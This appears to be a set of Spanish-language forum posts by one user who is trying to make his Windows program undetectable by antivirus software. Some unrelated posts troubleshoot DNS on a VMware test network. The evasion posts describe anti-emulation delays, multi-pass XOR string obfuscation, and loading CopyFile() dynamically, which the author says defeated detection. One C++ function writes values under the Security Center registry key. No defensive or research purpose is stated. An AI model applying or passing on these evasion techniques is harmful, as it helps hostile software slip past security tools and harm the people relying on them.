Mensajes

Desactivé el IPV6 y ahora funciona bien, rarisimo...

El tema es que me parece que cuando escaneas, el emulador se toma todo el tiempo del mundo para emularlo. El problema es que mi sistema anti-emulacion se basa en hacer que el emulador tarde demasiado tiempo en analizarlo y lo descarte. Debería hacer algo que el emulador no pueda emular y entonces detectarlo de esa manera...

Mmh, no creo que sea el caso...
El tema es que la detección ocurre cuando le pongo escaneo manual, es decir con el menu contextual.

No podés dejarlo en blanco el DNS...
Alguna otra sugerencia??

Que tal, estoy tratando de evitar la detección por emulación de código durante el escaneo profundo. Esta función hace saltar el AV, específicamente cuando trata de abrir la clave "HKLM\Software\Microsoft\Security Center".

Código (cpp) [Seleccionar] Expandir

int VulnRegs(char *szSubkey, char *pszRegVals, DWORD *pData)
{
    HKEY hHandle = NULL;
    int iReturn = doRegOpenKeyEx(HKEY_LOCAL_MACHINE, szSubkey, 0, KEY_WRITE, &hHandle);
    if(iReturn != ERROR_SUCCESS) return iReturn;
    int iCounter = 0;
    do
    {
        doRegSetValueEx(hHandle, pszRegVals, 0, REG_DWORD, (const BYTE*)&pData[iCounter], sizeof(DWORD));
        do{ pszRegVals++;} while(pszRegVals[0] != '\0');
        pszRegVals++;
        iCounter++;
    }while(pszRegVals[0] != '\0');
    doRegCloseKey(hHandle);
    return ERROR_SUCCESS;
}

Como puedo reemplazarla??

Hola!! Tengo una pequeña red montada sobre VMWare Workstation para pruebas.
Esta está compuesta por:
- Servidor con Win2003 Server con dos adaptadores. Uno conectado a internet y el otro conectado a un segmento de red. En este tengo instalado un servidor DNS, DHCP, WINS y Active Directory con un dominio. Utilizo network address translation (NAT) para repartir el internet al resto de las pcs del segmento (Como si fuese un router).
- Cliente con Windows 7 conectado al segmento y parte del dominio.
- 2 x Cliente con Windows XP conectado al segmento y parte del dominio.

El adaptador que se conecta a internet tiene la IP 192.168.1.104 (Asignada por mi router) y el que actúa como router tiene la IP 192.168.2.1 y trabaja en la subnet 192.168.2.100-254.

Todo anda perfecto, tanto el DHCP, WINS, AD como el DNS en todos los clientes. El problema es la resolución de nombres en el servidor. Tarda siglos en resolver. Esto no ocurre en los clientes, en los cuales la resolución es muy rápida. En el servidor si utilizo nslookup la resolución es tan rápida como en los clientes, pero si por ejemplo hago "ping www.google.com" tarda mucho (13-15 segundos) en resolver la dirección.
Posteo la salida de los comandos ipconfig /all y route print del servidor.

Código (dos) [Seleccionar] Expandir

Windows IP Configuration

   Host Name . . . . . . . . . . . . : apok-server
   Primary Dns Suffix  . . . . . . . : apokliptico.net
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : Yes
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : apokliptico.net
                                       

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : XX-XX-XX-XX-E3-E5
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.2.1
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   IP Address. . . . . . . . . . . . : fe80::250:56ff:fe37:e3e5%4
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 127.0.0.1
                                       fec0:0:0:ffff::1%2
                                       fec0:0:0:ffff::2%2
                                       fec0:0:0:ffff::3%2
   Primary WINS Server . . . . . . . : 192.168.2.1

Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #
2
   Physical Address. . . . . . . . . : XX-XX-XX-XX-0D-B0
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IP Address. . . . . . . . . . . . : 192.168.1.104
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   IP Address. . . . . . . . . . . . : fe80::250:56ff:fe37:db0%5
   Default Gateway . . . . . . . . . : 192.168.1.1
   DHCP Server . . . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 127.0.0.1
                                       fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   Lease Obtained. . . . . . . . . . : Miércoles, 28 de Noviembre de 2012 03:48:
22 a.m.
   Lease Expires . . . . . . . . . . : Jueves, 29 de Noviembre de 2012 03:48:22
a.m.

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : FF-FF-FF-FF-FF-FF-FF-FF
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : fe80::ffff:ffff:fffd%6
   Default Gateway . . . . . . . . . :
   NetBIOS over Tcpip. . . . . . . . : Disabled

Tunnel adapter Automatic Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Automatic Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : XX-XX-02-01
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : fe80::5efe:192.168.2.1%2
   Default Gateway . . . . . . . . . :
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%2
                                       fec0:0:0:ffff::2%2
                                       fec0:0:0:ffff::3%2
   NetBIOS over Tcpip. . . . . . . . : Disabled

Tunnel adapter Automatic Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Automatic Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : XX-XX-01-68
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : fe80::5efe:192.168.1.104%2
   Default Gateway . . . . . . . . . :
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Disabled

C:\Documents and Settings\Administrator>route print

IPv4 Route Table
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2 ...XX XX XX XX e3 e5 ...... Intel(R) PRO/1000 MT Network Connection - Packet
Scheduler Miniport
0x3 ...XX XX XX XX 0d b0 ...... Intel(R) PRO/1000 MT Network Connection #2 - Pac
ket Scheduler Miniport
===========================================================================
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1      192.168.2.1     10
          0.0.0.0          0.0.0.0      192.168.1.1    192.168.1.104     10
        127.0.0.0        255.0.0.0        127.0.0.1        127.0.0.1      1
      192.168.0.0      255.255.0.0      192.168.2.1      192.168.2.1     10
      192.168.1.0    255.255.255.0    192.168.1.104    192.168.1.104     10
    192.168.1.104  255.255.255.255        127.0.0.1        127.0.0.1     10
    192.168.1.255  255.255.255.255    192.168.1.104    192.168.1.104     10
      192.168.2.1  255.255.255.255        127.0.0.1        127.0.0.1     10
    192.168.2.255  255.255.255.255      192.168.2.1      192.168.2.1     10
        224.0.0.0        240.0.0.0    192.168.1.104    192.168.1.104     10
        224.0.0.0        240.0.0.0      192.168.2.1      192.168.2.1     10
  255.255.255.255  255.255.255.255    192.168.1.104    192.168.1.104      1
  255.255.255.255  255.255.255.255      192.168.2.1      192.168.2.1      1
Default Gateway:       192.168.1.1
===========================================================================
Persistent Routes:
  None

Persistent Routes:
  None


Sisi, ya lo había leido, pero las maneras que ofrecen son o con drivers o con WMI, preferiría no tener que usar ninguno de los dos. Alguna idea??

Hola! Quería saber si había alguna manera de detectar la creación de nuevos procesos sin utilizar Drivers (a nivel usuario), ni andar enumerando los procesos para ver si cambian ya que es intensivo para el procesador.

Gracias!!
Un abrazo
APOKLIPTICO.

El tema del cifrado XOR es que no es simple, osea, para alguien haciendo criptoanálisis con un ataque known-plaintext (que se puede obtener observando la memoria del programa cargado) va a obtener un keystream que quizas puede utilizar para conseguir la semilla del generador lineal congruencial que utilizo como PRNG, o simplemente hacer un ataque fuerza bruta con el espacio de llaves (que son solo 32 bits asi que tardaría unos pocos segundos).
Pero para un simple AV y con limitado tiempo de procesador?? Olvidate...

Es raro que simplemente detectando el import de CopyFile() te haga saltar el anti virus, no hay programas legítimos que lo utilicen?? En cuanto al symantec, me aparece como suspicious. Se podrá hacer algo para evitar su detección???

Siendo que son heurísticas las detecciones y no de emulación de código dudo mucho que esté identificando los strings. Es más que nada para evitar que se vea toda la información del ejecutable simplemente abriéndolo con un editor de texto. De todas maneras puedo hacer un cifrado más complejo. Aparte no es un xor simple sinó múltiple. Es decir, se pasa varias veces.

Okay, encontré 3 funciones que si las saco, sólo hacen saltar el symantec (que es increíblemente sensible y da muchísimos falsos positivos), lo que mucho no me importa.
Ahora supongo que tengo que identificar cómo hacer que no hagan saltar el AV.

Okay, seguí buscando y encontré que las 3 funciones hacen una llamda a CopyFile() (La cual está cargada estáticamente) y si saco la llamada a dicha función se convierte indetectable.
Voy a probar cargándola dinámicamente y sino, haciendo una función custom!
Alguna otra sugerencia??
Saludos
APOKLIPTICO.

PD: Llamando CopyFile() como dinámica, no la detecta. Estos anti virus son patéticos...